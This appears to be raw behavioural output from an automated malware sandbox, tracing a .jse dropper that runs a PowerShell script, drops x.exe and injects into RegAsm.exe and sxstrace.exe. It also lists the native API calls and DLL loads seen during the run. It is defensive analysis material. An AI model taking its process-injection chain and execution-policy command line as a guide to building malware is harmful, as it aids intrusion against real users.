Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0042C5A3 NtClose,	6_2_0042C5A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_026F2B60 NtClose,LdrInitializeThunk,	6_2_026F2B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_026F2C70 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_026F2C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_026F2DF0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_026F2DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_026F35C0 NtCreateMutant,LdrInitializeThunk,	6_2_026F35C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_026F4340 NtSetContextThread,	6_2_026F4340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_026F4650 NtSuspendThread,	6_2_026F4650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_026F2AF0 NtWriteFile,	6_2_026F2AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_026F2AD0 NtReadFile,	6_2_026F2AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_026F2AB0 NtWaitForSingleObject,	6_2_026F2AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_026F2BE0 NtQueryValueKey,	6_2_026F2BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_026F2BF0 NtAllocateVirtualMemory,	6_2_026F2BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_026F2BA0 NtEnumerateValueKey,	6_2_026F2BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_026F2B80 NtQueryInformationFile,	6_2_026F2B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_026F2E30 NtWriteVirtualMemory,	6_2_026F2E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_026F2EE0 NtQueueApcThread,	6_2_026F2EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_026F2EA0 NtAdjustPrivilegesToken,	6_2_026F2EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_026F2E80 NtReadVirtualMemory,	6_2_026F2E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_026F2F60 NtCreateProcessEx,	6_2_026F2F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_026F2F30 NtCreateSection,	6_2_026F2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_026F2FE0 NtCreateFile,	6_2_026F2FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_026F2FA0 NtQuerySection,	6_2_026F2FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_026F2FB0 NtResumeThread,	6_2_026F2FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_026F2F90 NtProtectVirtualMemory,	6_2_026F2F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_026F2C60 NtCreateKey,	6_2_026F2C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_026F2C00 NtQueryInformationProcess,	6_2_026F2C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_026F2CF0 NtOpenProcess,	6_2_026F2CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_026F2CC0 NtQueryVirtualMemory,	6_2_026F2CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_026F2CA0 NtQueryInformationToken,	6_2_026F2CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_026F2D30 NtUnmapViewOfSection,	6_2_026F2D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_026F2D00 NtSetInformationFile,	6_2_026F2D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_026F2D10 NtMapViewOfSection,	6_2_026F2D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_026F2DD0 NtDelayExecution,	6_2_026F2DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_026F2DB0 NtEnumerateKey,	6_2_026F2DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_026F3010 NtOpenDirectoryObject,	6_2_026F3010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_026F3090 NtSetValueKey,	6_2_026F3090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_026F39B0 NtGetContextThread,	6_2_026F39B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_026F3D70 NtOpenThread,	6_2_026F3D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_026F3D10 NtOpenProcessToken,	6_2_026F3D10
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_045E35C0 NtCreateMutant,LdrInitializeThunk,	8_2_045E35C0
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_045E4650 NtSuspendThread,LdrInitializeThunk,	8_2_045E4650
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_045E4340 NtSetContextThread,LdrInitializeThunk,	8_2_045E4340
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_045E2C70 NtFreeVirtualMemory,LdrInitializeThunk,	8_2_045E2C70
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_045E2C60 NtCreateKey,LdrInitializeThunk,	8_2_045E2C60
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_045E2CA0 NtQueryInformationToken,LdrInitializeThunk,	8_2_045E2CA0
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_045E2D10 NtMapViewOfSection,LdrInitializeThunk,	8_2_045E2D10
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_045E2D30 NtUnmapViewOfSection,LdrInitializeThunk,	8_2_045E2D30
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_045E2DD0 NtDelayExecution,LdrInitializeThunk,	8_2_045E2DD0
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_045E2DF0 NtQuerySystemInformation,LdrInitializeThunk,	8_2_045E2DF0
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_045E2EE0 NtQueueApcThread,LdrInitializeThunk,	8_2_045E2EE0
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_045E2E80 NtReadVirtualMemory,LdrInitializeThunk,	8_2_045E2E80
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_045E2F30 NtCreateSection,LdrInitializeThunk,	8_2_045E2F30
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_045E2FE0 NtCreateFile,LdrInitializeThunk,	8_2_045E2FE0
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_045E2FB0 NtResumeThread,LdrInitializeThunk,	8_2_045E2FB0
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_045E39B0 NtGetContextThread,LdrInitializeThunk,	8_2_045E39B0
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_045E2AD0 NtReadFile,LdrInitializeThunk,	8_2_045E2AD0
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_045E2AF0 NtWriteFile,LdrInitializeThunk,	8_2_045E2AF0
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_045E2B60 NtClose,LdrInitializeThunk,	8_2_045E2B60
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_045E2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	8_2_045E2BF0
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_045E2BE0 NtQueryValueKey,LdrInitializeThunk,	8_2_045E2BE0
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_045E2BA0 NtEnumerateValueKey,LdrInitializeThunk,	8_2_045E2BA0
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_045E3010 NtOpenDirectoryObject,	8_2_045E3010
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_045E3090 NtSetValueKey,	8_2_045E3090
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_045E2C00 NtQueryInformationProcess,	8_2_045E2C00
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_045E2CC0 NtQueryVirtualMemory,	8_2_045E2CC0
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_045E2CF0 NtOpenProcess,	8_2_045E2CF0
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_045E3D70 NtOpenThread,	8_2_045E3D70
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_045E3D10 NtOpenProcessToken,	8_2_045E3D10
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_045E2D00 NtSetInformationFile,	8_2_045E2D00
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_045E2DB0 NtEnumerateKey,	8_2_045E2DB0
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_045E2E30 NtWriteVirtualMemory,	8_2_045E2E30
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_045E2EA0 NtAdjustPrivilegesToken,	8_2_045E2EA0
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_045E2F60 NtCreateProcessEx,	8_2_045E2F60
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_045E2F90 NtProtectVirtualMemory,	8_2_045E2F90
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_045E2FA0 NtQuerySection,	8_2_045E2FA0
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_045E2AB0 NtWaitForSingleObject,	8_2_045E2AB0
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_045E2B80 NtQueryInformationFile,	8_2_045E2B80
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_00509160 NtCreateFile,	8_2_00509160
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_005092D0 NtReadFile,	8_2_005092D0
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_005093C0 NtDeleteFile,	8_2_005093C0
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_00509460 NtClose,	8_2_00509460
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: 8_2_005095C0 NtAllocateVirtualMemory,	8_2_005095C0

Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: String function: 0461EA12 appears 86 times
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: String function: 045F7E54 appears 93 times
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: String function: 0459B970 appears 254 times
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: String function: 0462F290 appears 103 times
Source: C:\Windows\SysWOW64\sxstrace.exe	Code function: String function: 045E5130 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 026F5130 appears 58 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 026AB970 appears 262 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 02707E54 appears 99 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0273F290 appears 103 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0272EA12 appears 86 times

Source: x.exe.1.dr, -----------------------------------------.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1.2.powershell.exe.2409068bb78.0.raw.unpack, -----------------------------------------.cs	Cryptographic APIs: 'CreateDecryptor'

Source: RegAsm.exe, 00000006.00000002.1855652886.0000000000950000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: n_ip_tcpBS;.VBpp
Source: RegAsm.exe, 00000006.00000002.1855652886.0000000000950000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: BS;.VBp

Source: C:\Users\user\AppData\Local\Temp\x.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3992:120:WilError_03

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11001_10032.jse"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	Process created: C:\Windows\SysWOW64\sxstrace.exe "C:\Windows\SysWOW64\sxstrace.exe"
Source: C:\Windows\SysWOW64\sxstrace.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exe	Process created: C:\Windows\SysWOW64\sxstrace.exe "C:\Windows\SysWOW64\sxstrace.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: profapi.dll	Jump to behavior
